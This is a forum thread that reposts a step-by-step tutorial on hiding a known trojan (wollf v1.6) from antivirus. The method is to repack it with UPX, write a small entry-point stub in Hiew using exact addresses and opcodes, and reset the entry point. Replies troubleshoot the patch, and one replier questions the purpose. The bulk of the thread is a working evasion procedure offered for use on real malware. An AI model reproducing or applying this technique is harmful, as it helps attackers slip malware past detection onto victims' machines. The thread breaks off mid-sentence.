Assembler Help

++++++++++++++++++++++++++++++++++++++++
Universal method of tricking antivirus.
By Progressor

Tools:
Hex redactor - I used Hiew 6.75 (http://webhost.kemtel.ru/~sen)
Fearless PE Tool 0.1 - http://areyoufearless.com/modules.php?op=m...q=getit&lid=125
UPX packer - http://upx.sourceforge.net/
Brain - must have it, you can't download it.

I took for example well known trojan wollf v1.6 (www.xfocus.org)

Now, let start:

Wollf is already packed by an old version of UPX, so we unpack and pack it again by newest version

of UPX.
Now we are using PE tool and we will find this info about our trojan:

Entry Point: 00024FD0h
Image Base: 00400000h

Let us open wollf.exe in Hiew, go to disassemble mode (F4/Decode), go to address Entry Point + Image Base = 00424FD0h, for doing this press Goto (F5) and type ".00424FD0" (you need this dot before address, because it is a virtual address). Now we see something like this:


CODE

.00424FD0: 60 pushad
.00424FD1: BE00804100 mov esi,000418000 -----^ (1)
.00424FD6: 8DBE0090FEFF lea edi,[esi][0FFFE9000]
.00424FDC: 57 push edi
.00424FDD: 83CDFF or ebp,-001;"O"
.00424FE0: EB10 jmps .000424FF2 -----v (2)




Now we have to find place for our patch, scroll down a couple of pages and you'll see a lot of place with zeros. I choose address 00425147. For edit press F3/F2.
OEP = Entry Point + Image Base


CODE

.00425147: 68D04F4200 push 000424FD0 <--- push OEP
.0042514C: 50 push eax
.0042514D: 9C pushfd <---for tricking AVP
.0042514E: 60 pushad <---for tricking AVP
.0042514F: E800000000 call .000425154 <----- call for Ret 28h




add another command: Ret 28h you will see

CODE

.00425154: C22800 retn 00028;" ("




for Save press F9

and we add another 2 commands
INC ECX
LOOP patch address


CODE

.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147




Finally we have our patch:


CODE

.0042513F: 0000 add [eax],al
.00425141: 0000 add [eax],al
.00425143: 0000 add [eax],al
.00425145: 0000 add [eax],al
.00425147: 68D04F4200 push 000424FD0 -----^ (1)
.0042514C: 50 push eax
.0042514D: 9C pushfd
.0042514E: 60 pushad
.0042514F: E800000000 call .000425154 -----v (2)
.00425154: C22800 retn 00028;" ("
.00425157: 0000 add [eax],al
.00425159: 0000 add [eax],al
.0042515B: 0000 add [eax],al
.0042515D: 0000 add [eax],al
.0042515F: 0000 add [eax],al
.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147 -----^ (3)
.00425164: 0000 add [eax],al
.00425166: 0000 add [eax],al
.00425168: 0000 add [eax],al




And last thing we should do, we open the file in PE tool and change Entry Point:
Entry Point = Offset - Image Base = 00425161 - 00400000 = 0025161h

Now, if you can unpack the file with UPX, then I suppose you did it right. (don't forget to backup

your file or you'll have to make this patch again.)
Enjoy.
+++++++++++++++++++++++++++++++++++++++++++++++


I don't know any assembly but always eager to learn

I encounter a problem while trying to reproduce the above:

call .000425154
loop .000425147

In both cases hiew gives me an error "Invalid Operand". I CAN add the addresses without a "dot" but I guess that wont work.

Any idea what I'm doing wrong?


Thanks in advance

Well,
notice that when in edit mode, hiew doesn't show virtual addresses, but offsets; so write corresponding offset and you are done.
But one question comes to my mind, why are you trying repack trojan and hide it from AVP??? So why instead of damaging people won't you try to do some cracking? Is it too hard when compared to simple applying someone elses ideas on someone elses trojan?

heh, I'm not trying to destroy anything dude, it's just the first thing i got my hands on. =/

Anyways, one more question:
after this command,
.00425162: E2E3 loop .000425147 -----^ (3)

I got error, "jump out of bounds".....??

Are you sure you typed in right offset (of instruction push 000424FD0)?
The error means that you are try to jump too far...

yup, I triple checked it, but no luck.


help

So go from the other end, type in the hex values (E2 E3) and see what comes from it - then compare with what you typed in before.

Cool, that worked, much thanks Least

I was thinking, Is it possible to not use the direct addresses? ex, if want to have 0x00430F00 so i push 0x00430000 and add F00 later. I hope you understand. Is it possible?

Of course yes, you can push une value, add to it something, then ret and you are there; or you can do something like jmp eax, where eax can be calculated any way you can think of. And much more - get processor manuals and use you imagination (or google